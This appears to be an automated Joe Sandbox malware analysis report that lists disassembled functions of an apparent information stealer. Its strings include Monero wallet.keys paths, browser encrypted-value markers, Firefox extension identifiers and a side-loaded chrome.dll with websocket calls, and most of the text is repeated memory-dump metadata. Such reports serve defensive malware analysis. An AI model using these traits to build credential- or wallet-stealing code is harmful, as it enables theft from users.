                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 8f6b5e484dfb7ab78011eeb4934094bd52f81c5e234ca28d566a5c3a43be0e0f
                                        • Instruction ID: 1eedfa9ad10aa1c5a6ff58fc87d62edd375b60092ed1c5157ccf919d4cfc3150
                                        • Opcode Fuzzy Hash: 8f6b5e484dfb7ab78011eeb4934094bd52f81c5e234ca28d566a5c3a43be0e0f
                                        • Instruction Fuzzy Hash: 0C2130B1A44204EFDB04DFD4DD49FAEBBB8FB48711F10411DF615A7290D775A9018BA1
                                        Function 007BA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007BA098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: dc8c3f504ad485be79bdaf87b3b500faad22bb6bcddd05ebf825e2033803a8e3
                                        • Instruction ID: ad33ccb6e7f53bc011f7412268c668dac6d5a15e3ff2ffd54adce9bf43b4f20c
                                        • Opcode Fuzzy Hash: dc8c3f504ad485be79bdaf87b3b500faad22bb6bcddd05ebf825e2033803a8e3
                                        • Instruction Fuzzy Hash: 9EF01D7065D218BED711FBE5ED88B9972B4E345300F70152AE005972A0D7B9D886DB62
                                        Function 007C8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007C96AE,00000000), ref: 007C8EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C8EF2
                                        • wsprintfW.USER32 ref: 007C8F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 0112c8f7bd78998eee649e38c2205e9d5700d1e92371a876754f430b33cf053d
                                        • Instruction ID: 411dc9d3a6d6dfdbe8881f37924bf77eb5f49ae26e7b8bb7c1ee46e9db52ca7c
                                        • Opcode Fuzzy Hash: 0112c8f7bd78998eee649e38c2205e9d5700d1e92371a876754f430b33cf053d
                                        • Instruction Fuzzy Hash: 02E08CB0A48308BBDB00CBD4DD0AEAD7BB8EB04301F100194FD0987340EA719E009B91
                                        Function 007BA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BAA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 007BAB2F
                                        • lstrlen.KERNEL32(00000000), ref: 007BADEC
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BAE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 84747fb50adf801b98590e945e1ae1f635cf6773775b4e012245631362af3440
                                        • Instruction ID: 510a48312ea43ccdf1fd39b93fed0b19070c19cf548bbada19d9cd938e0c863f
                                        • Opcode Fuzzy Hash: 84747fb50adf801b98590e945e1ae1f635cf6773775b4e012245631362af3440
                                        • Instruction Fuzzy Hash: 1EE1DDB291010CEBCB14EBA4DDAAFEE7339AF14305F50855DF51672091EE386A48CB76
                                        Function 007BD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BD581
                                        • lstrlen.KERNEL32(00000000), ref: 007BD798
                                        • lstrlen.KERNEL32(00000000), ref: 007BD7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BD82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 041d66d05a35dde2ee2187012edf3e9b6a9d16e315d63df2a6ca6d7c6a34478b
                                        • Instruction ID: 02866b7b0ead1f2aa140b86f52f0f1f51dcb74478b29bfd4c27ea9b20af59641
                                        • Opcode Fuzzy Hash: 041d66d05a35dde2ee2187012edf3e9b6a9d16e315d63df2a6ca6d7c6a34478b
                                        • Instruction Fuzzy Hash: 9291E0B291010CEBCB14EBA4DCAAFEE7339AF14305F50456DF51766191EF386A08CB66
                                        Function 007BD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BD901
                                        • lstrlen.KERNEL32(00000000), ref: 007BDA9F
                                        • lstrlen.KERNEL32(00000000), ref: 007BDAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BDB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 189d421aa04f77170b2c559808e899ae18922cd1eafe9bc5317ce4b2ed61f3fd
                                        • Instruction ID: f101dbb66a2610567a409a763ab0d6327c5f0ab0d9be255f24bdf84df838b431
                                        • Opcode Fuzzy Hash: 189d421aa04f77170b2c559808e899ae18922cd1eafe9bc5317ce4b2ed61f3fd
                                        • Instruction Fuzzy Hash: 0181ECB291010CEBCB14EBA4DCAAFEE7339AF14309F50455DF50766191EE386A08CB66
                                        Function 0082FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: b2dfddffd02c0a4ef2d2eed842b673a80b4195c8ef989cae9473c89558e59c87
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 4E51E372500626AFEB298F18E961BBA77B4FF41300F24413DEA05D6592EB31ED80DB91
                                        Function 007BA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007BA664
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 1d6351ce7d6e31cc139e37c7b12f0b2ebca992c831e5ec073ac2f32dbf1c1223
                                        • Instruction ID: 9eb8762346e06c401c024023308e2271073818a7a53c44b937cbad640d4cc97b
                                        • Opcode Fuzzy Hash: 1d6351ce7d6e31cc139e37c7b12f0b2ebca992c831e5ec073ac2f32dbf1c1223
                                        • Instruction Fuzzy Hash: F5512BB0A1420CEFDB24EFA4CDAAFED7775AF54344F408118F90A5B291EB786A05CB51
                                        Function 007BF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,007D1678,007D0D93), ref: 007BF64C
                                        • lstrlen.KERNEL32(00000000), ref: 007BF66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: 961326cbe211d095f0e510f117e3f8ed3f319cf0e2e3a6706965da49bb3858e3
                                        • Instruction ID: 500251240799db1c3c02cfbb1d8991e2f77dee7b5c66fc23c71f76226ce1144b
                                        • Opcode Fuzzy Hash: 961326cbe211d095f0e510f117e3f8ed3f319cf0e2e3a6706965da49bb3858e3
                                        • Instruction Fuzzy Hash: B9511FB191010CFACB04FFA4ED6AEED7339AF54305F40856CF91667191EE386A08CB66
                                        Function 007C37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
